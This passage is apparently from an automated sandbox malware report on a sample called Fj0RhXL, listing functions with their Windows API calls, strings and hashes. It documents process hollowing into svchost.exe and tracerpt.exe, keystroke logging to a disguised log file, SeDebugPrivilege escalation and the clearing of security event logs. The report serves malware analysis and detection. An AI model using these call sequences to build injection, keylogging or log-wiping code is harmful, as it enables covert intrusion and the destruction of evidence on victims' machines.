SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00043FBF,00000000,?,00000000,00043FBF,00003000,00000040,74DF0630), ref: 02F05992
ResumeThread.KERNEL32(?,?,00000000,?,00043FBF,00000000,?,00000000,00043FBF,00003000,00000040,74DF0630), ref: 02F059B1

Strings

Windows\System32\tracerpt.exe, xrefs: 02F058DB
D, xrefs: 02F0586C
%s%s, xrefs: 02F058B3, 02F058E7
Windows\SysWOW64\tracerpt.exe, xrefs: 02F058AD

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
API String ID: 2170139861-1986163084
Opcode ID: 928655b267625d0ed1cba4c55e5f69b4b31f5c703bd51970efa403795fbb3cef
Instruction ID: 4dd44e3034c801d10e50041d274e7ba4cdbffd33a5d5f519b42f9ef0bf04b780
Opcode Fuzzy Hash: 928655b267625d0ed1cba4c55e5f69b4b31f5c703bd51970efa403795fbb3cef
Instruction Fuzzy Hash: BA41B7B0E40309ABE720DF70DC95FAAB7B8AF44B44F90459DB64DA71C0DBB09A808F54

Function 03D89350 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 131threadinjectionprocessCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D89373
_memset.LIBCMT ref: 03D8939F
_memset.LIBCMT ref: 03D893D4
GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03D893E8

Part of subcall function 03D8B270: _vswprintf_s.LIBCMT ref: 03D8B281

GetFileAttributesA.KERNEL32(?), ref: 03D89415
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 03D89465
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 03D89492
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 03D894AA
GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 03D894CC
SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 03D894EA
ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 03D894FF

Strings

Windows\System32\svchost.exe, xrefs: 03D89426
D, xrefs: 03D893B3
%s%s, xrefs: 03D893FA, 03D8942C
Windows\SysWOW64\svchost.exe, xrefs: 03D893EE

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
API String ID: 2170139861-2473635271
Opcode ID: 00c7e8a34df49c0372c2b3247e06a83271ac3de0bf50651430578e41cea224d5
Instruction ID: 23ef30bb443cc7e794f4bfaaf73ffa9055f02270efae20a4ea0ca466b1534cfc
Opcode Fuzzy Hash: 00c7e8a34df49c0372c2b3247e06a83271ac3de0bf50651430578e41cea224d5
Instruction Fuzzy Hash: FE4187B6A00218EBDB21EB64DC95FEE77BCDB44B00F0045D9E64DA61C0E6B0AB85CF54

Function 03D99090 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143synchronizationfilekeyboardCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,03DC31A0,74DEE010,74DF2FA0,74DF0F00,?,03D86858,?,?), ref: 03D990B9
lstrcatW.KERNEL32(03DC31A0,\DisplaySessionContainers.log,?,03D86858,?,?), ref: 03D990C9
CreateMutexW.KERNEL32(00000000,00000000,03DC31A0,?,03D86858,?,?), ref: 03D990D8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,03D86858,?,?), ref: 03D990E6
CreateFileW.KERNEL32(03DC31A0,40000000,00000002,00000000,00000004,00000080,00000000,?,03D86858,?,?), ref: 03D99103
GetFileSize.KERNEL32(00000000,00000000,?,03D86858,?,?), ref: 03D9910E
CloseHandle.KERNEL32(00000000,?,03D86858,?,?), ref: 03D99117
DeleteFileW.KERNEL32(03DC31A0,?,03D86858,?,?), ref: 03D9912A
ReleaseMutex.KERNEL32(?,?,03D86858,?,?), ref: 03D99137
DirectInput8Create.DINPUT8(?,00000800,03DB5274,03DC3640,00000000,?,03D86858,?,?), ref: 03D99152
GetTickCount.KERNEL32 ref: 03D99205
GetKeyState.USER32(00000014), ref: 03D99212

Strings

<, xrefs: 03D991D7
\DisplaySessionContainers.log, xrefs: 03D990BF

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
String ID: <$\DisplaySessionContainers.log
API String ID: 1095970075-1170057892
Opcode ID: 9bfdd95d4c5be35dbaaa3260b58412526f7c65bdeeaa8da35e2911f38483ad83
Instruction ID: 6c394ecd7a2ff6b591e0333561a949c92f54253f0821cf915fd56c9f58813fe7
Opcode Fuzzy Hash: 9bfdd95d4c5be35dbaaa3260b58412526f7c65bdeeaa8da35e2911f38483ad83
Instruction Fuzzy Hash: 2541A076B50306EFEB00EFA4DC99F9A77A8AB48B00F108409F605AB384D775E506CB90

Function 03D88B20 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,74DF2EE0,?,?,?,?,?,?,03D98B3E), ref: 03D88B37
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,03D98B3E), ref: 03D88B3E
LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03D88B5A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03D88B77
CloseHandle.KERNEL32(?), ref: 03D88B81
GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,03D98B3E), ref: 03D88B91
GetProcAddress.KERNEL32(00000000), ref: 03D88B98
GetCurrentProcessId.KERNEL32 ref: 03D88BBA
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 03D88BC7

Strings

NtSetInformationProcess, xrefs: 03D88B87
NtDll.dll, xrefs: 03D88B8C
SeDebugPrivilege, xrefs: 03D88B4C

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
API String ID: 1802016953-1577477132
Opcode ID: 5d430b1287980dd0e437b1ab8b81585f1dad1bb5f5d9f09d5f424d6491f7516f
Instruction ID: 40633f9e74ae0064d05ce6edbbbadeb65c2e1c5ce399c425db789c3bbd280b94
Opcode Fuzzy Hash: 5d430b1287980dd0e437b1ab8b81585f1dad1bb5f5d9f09d5f424d6491f7516f
Instruction Fuzzy Hash: AD213673A40309EFEB10EFE4DC4AFBE7778DB48B01F400549B615AA284DAB49545CBA1

Function 6C3ADD8F Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 362COMMON

Download Yara Rule

Strings

Shift+, xrefs: 6C3ADEF5
Ctrl+, xrefs: 6C3ADEFC, 6C3ADF18
Alt+, xrefs: 6C3ADF06
%s%sF%d, xrefs: 6C3ADF1C

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: Create$CloseValue$_sprintf$FileModuleName
String ID: %s%sF%d$Alt+$Ctrl+$Shift+
API String ID: 2934808895-1571627948
Opcode ID: f121afe4aeaf252b1c74ff411acb91a4ad7cd5d76c6699541ac0189e66e7e16c
Instruction ID: 8ffb3cebd31f2d70dc01ca16771c96b1ff464e47c92d3bc3f50770d06caa488b
Opcode Fuzzy Hash: f121afe4aeaf252b1c74ff411acb91a4ad7cd5d76c6699541ac0189e66e7e16c
Instruction Fuzzy Hash: F6C116317042059BDB14EFB9CC92FAA77F9EB4635CF14452AE451CBA80D725D822CFA1

Function 6C39BDD0 Relevance: 14.5, APIs: 6, Strings: 2, Instructions: 480COMMON

Download Yara Rule

APIs

Part of subcall function 6C39D06F: _fseek.LIBCMT ref: 6C39D0BD
Part of subcall function 6C39D06F: __fread_nolock.LIBCMT ref: 6C39D0EA
Part of subcall function 6C39D06F: _sprintf.LIBCMT ref: 6C39D152

_fseek.LIBCMT ref: 6C39BEB4
_malloc.LIBCMT ref: 6C39BECC

Part of subcall function 6C3D37D0: __FF_MSGBANNER.LIBCMT ref: 6C3D37E9
Part of subcall function 6C3D37D0: __NMSG_WRITE.LIBCMT ref: 6C3D37F0
Part of subcall function 6C3D37D0: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C3D7A8B,?,00000001,?,?,6C3D7F4A,00000018,6C442E78,0000000C,6C3D7FDA), ref: 6C3D3815

_memset.LIBCMT ref: 6C39BEE7
_sprintf.LIBCMT ref: 6C39C453
_sprintf.LIBCMT ref: 6C39C49F
_free.LIBCMT ref: 6C39C4AD

Strings

error in ephemeris file: %d coefficients instead of %d. , xrefs: 6C39C448
error in ephemeris file %s: %d coefficients instead of %d. , xrefs: 6C39C494

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$_fseek$AllocateHeap__fread_nolock_free_malloc_memset
String ID: error in ephemeris file %s: %d coefficients instead of %d. $error in ephemeris file: %d coefficients instead of %d.
API String ID: 5245458-905328425
Opcode ID: 66dc2f525807ba01f5366b9b7d9f0e819ce9ef2ca8292e89655409d6e84b58b0
Instruction ID: a803f49e3636383c99b1bb533a9ed0a3f22198b6b0f836549389cacbc4097d44
Opcode Fuzzy Hash: 66dc2f525807ba01f5366b9b7d9f0e819ce9ef2ca8292e89655409d6e84b58b0
Instruction Fuzzy Hash: 0812FF71E0061ADBEB25DF15DC40BE9B7B2FB84314F1186EAD54EB2690EB319A90CF10

Function 03D9BC4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92memorylibraryloaderCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 03D9BC73
GetSystemInfo.KERNEL32(?), ref: 03D9BC8B
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03D9BC9B
GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 03D9BCAB
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03D9BCFD
VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03D9BD12

Strings

kernel32.dll, xrefs: 03D9BC94
SetThreadStackGuarantee, xrefs: 03D9BCA5

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
String ID: SetThreadStackGuarantee$kernel32.dll
API String ID: 3290314748-423161677
Opcode ID: 0f465235797a8a047ade74d17296fe4cf93befaa8277561b4e95f0e27097dc0c
Instruction ID: 8c80ab040e0a81d3bb95bc0059af403136f504ee46d36628a43b1e31eb7b73fd
Opcode Fuzzy Hash: 0f465235797a8a047ade74d17296fe4cf93befaa8277561b4e95f0e27097dc0c
Instruction Fuzzy Hash: 54318472E0021DEFEF10DBE4EC84AEEB7B8EF44B51B154517E506E6140EB70AA04CB94

Function 03D89070 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 03D89089
OpenProcessToken.ADVAPI32(00000000), ref: 03D89090
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03D890B6
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03D890CC
GetLastError.KERNEL32 ref: 03D890D2
CloseHandle.KERNEL32(?), ref: 03D890E0
CloseHandle.KERNEL32(?), ref: 03D890FB

Strings

SeShutdownPrivilege, xrefs: 03D890A2

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3435690185-3733053543
Opcode ID: 3250dcac45bdcafb37807497172bb2e84b2591ca3618f8bbb045365a2d31ccca
Instruction ID: 9efd02268b03e8f7ba71efd93f35dadaf9a9b0aa69baeb9de79fb3bd7f2ba333
Opcode Fuzzy Hash: 3250dcac45bdcafb37807497172bb2e84b2591ca3618f8bbb045365a2d31ccca
Instruction Fuzzy Hash: 3511AB73A00208DFDB10EFB4DC49FAE7778DB48B10F400959F905DB284DA71AA55C790

Function 6C3C8C7D Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(00000000,6C4485EC,6C4485F0,00000000,6C3D1BD0,6C46DAA0,6C46DA60,?,6C351356), ref: 6C3C8D16
WriteProfileStringA.KERNEL32(Desktop,TileWallpaper,6C403018), ref: 6C3C8D61
WriteProfileStringA.KERNEL32(Desktop,WallpaperStyle,6C4030C8), ref: 6C3C8DA8
SystemParametersInfoA.USER32(00000014,00000000,00000003), ref: 6C3C8DB6

Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C86C1
Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C86C9
Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C870C
Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C874E
Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C8789
Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C87C4

Strings

Desktop, xrefs: 6C3C8D5B, 6C3C8D60, 6C3C8DA7
TileWallpaper, xrefs: 6C3C8D56
WallpaperStyle, xrefs: 6C3C8DA2

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _fputc$ProfileStringWrite$InfoMutexParametersReleaseSystem
String ID: Desktop$TileWallpaper$WallpaperStyle
API String ID: 2760925735-2776484331
Opcode ID: 4ca5592edad727c9ef66a43acc6d4f5da7404c73213e6c9840a82354274653ab
Instruction ID: 9da3cb0c203713ebf43aa8052db23e857bb08442b25402016bfaf0225263f7f0
Opcode Fuzzy Hash: 4ca5592edad727c9ef66a43acc6d4f5da7404c73213e6c9840a82354274653ab
Instruction Fuzzy Hash: 9531D9347461416ADF10FB299C44EADA639E79271CB64C027E950CBE44C722CE469F67

Function 03D96080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON

Download Yara Rule

APIs

OpenEventLogW.ADVAPI32(00000000,03DB65EC), ref: 03D960A7
ClearEventLogW.ADVAPI32(00000000,00000000), ref: 03D960B2
CloseEventLog.ADVAPI32(00000000), ref: 03D960B9

Strings

Application, xrefs: 03D96086
System, xrefs: 03D96096
Security, xrefs: 03D9608E

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Event$ClearCloseOpen
String ID: Application$Security$System
API String ID: 1391105993-2169399579
Opcode ID: d09301c763e5c0772c11930f14332e2747c2616ffa70e85cf1e56a5e72d57c6a
Instruction ID: 65e58ca36dd08d48a2f6cf58a19cea51cfab4d4a0f3a7ec0906624fd5a5e8355
Opcode Fuzzy Hash: d09301c763e5c0772c11930f14332e2747c2616ffa70e85cf1e56a5e72d57c6a
Instruction Fuzzy Hash: B1E0ED73605210CBD221EB15A88875AF3E0FBC8716F040A1EE94D93308C630C8228B9A

Function 03BF7B0F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03BF7BA0
swprintf.LIBCMT ref: 03BF7BF8
swprintf.LIBCMT ref: 03BF7C0B

Strings

:, xrefs: 03BF7B3F
@, xrefs: 03BF7BAC

Memory Dump Source

Source File: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3bf0000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: swprintf$_memset
String ID: :$@
API String ID: 1292703666-1367939426
Opcode ID: dfe623fccbc4960a75ec84bb90a095736d32cf22afdac25adabc4b4dc478b11c
Instruction ID: 0a64379289b08645aeea860ad7ac6395966ab4d8c6c3c131727ee84d78711a13
Opcode Fuzzy Hash: dfe623fccbc4960a75ec84bb90a095736d32cf22afdac25adabc4b4dc478b11c
Instruction Fuzzy Hash: E0315DB6D0021C9BDB14CFE5CC95BEEB7B9EB48300F518219EA1AAB241EA745945CB90

Function 03DA8F3D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,03DA957A,?,03D9D1B4,?,000000BC,?,00000001,00000000,00000000), ref: 03DA8F7C
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,03DA957A,?,03D9D1B4,?,000000BC,?,00000001,00000000,00000000), ref: 03DA8FA5
GetACP.KERNEL32(?,?,03DA957A,?,03D9D1B4,?,000000BC,?,00000001,00000000), ref: 03DA8FB9

Strings

OCP, xrefs: 03DA8F5D
ACP, xrefs: 03DA8F4C

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: dcfa296981b76b1e55ca20a2e55c0d2955c5c425df9462ec224ce8e76a31becf
Instruction ID: 98e1a9d24fa674320dbccfc04ae43cca2e767297761c8770503b5553fdd9e8c2
Opcode Fuzzy Hash: dcfa296981b76b1e55ca20a2e55c0d2955c5c425df9462ec224ce8e76a31becf
Instruction Fuzzy Hash: 2C012831205B07FEEB11DA69EE05B9E7EA9AB00758F144454F901E0080EB60C641D250

Function 6C3EF83C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6C3EFEA5,?,6C3DFB61,?,000000BC,?), ref: 6C3EF87B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6C3EFEA5,?,6C3DFB61,?,000000BC,?), ref: 6C3EF8A4
GetACP.KERNEL32(?,?,6C3EFEA5,?,6C3DFB61,?,000000BC,?), ref: 6C3EF8B8

Strings

ACP, xrefs: 6C3EF84B
OCP, xrefs: 6C3EF85C

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 42d42421e74f6792faa5ca4878eb765be051e297cf08d517e94a4e4e95e5c30b
Instruction ID: 55f60ff08b986a0af61a589f43b9ba93b32c8ac751519c017bd3c52230b61ccd
Opcode Fuzzy Hash: 42d42421e74f6792faa5ca4878eb765be051e297cf08d517e94a4e4e95e5c30b
Instruction Fuzzy Hash: 1701243170521BBAEB21CB51F909FCA33BC9F0D35CF204566E505E0880EBA1D6418F51

Function 03D88C40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,03D88DFC), ref: 03D88C56
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,03D88DFC,?,?,?,?,?,?,74DF0630), ref: 03D88C5D
LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03D88C85
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 03D88CB9

Strings

SeDebugPrivilege, xrefs: 03D88C7E

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 2349140579-2896544425
Opcode ID: 85a88cbcf8fda8b01833f461f117eb5f6cc98b5bae11c1743194b20697ed33e0
Instruction ID: cd4d97f179675c6bd98586888f832b3e39490b8aa561cfb94851e524ac384467
Opcode Fuzzy Hash: 85a88cbcf8fda8b01833f461f117eb5f6cc98b5bae11c1743194b20697ed33e0
Instruction Fuzzy Hash: 71112572E40208EBDF14EFE4D849FEEB7B4EB48B00F104559F506AB284EA74A555CB50

Function 03D9A49B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 03D9FEBD
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03D9FED2
UnhandledExceptionFilter.KERNEL32(03DB2F70), ref: 03D9FEDD
GetCurrentProcess.KERNEL32(C0000409), ref: 03D9FEF9
TerminateProcess.KERNEL32(00000000), ref: 03D9FF00

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

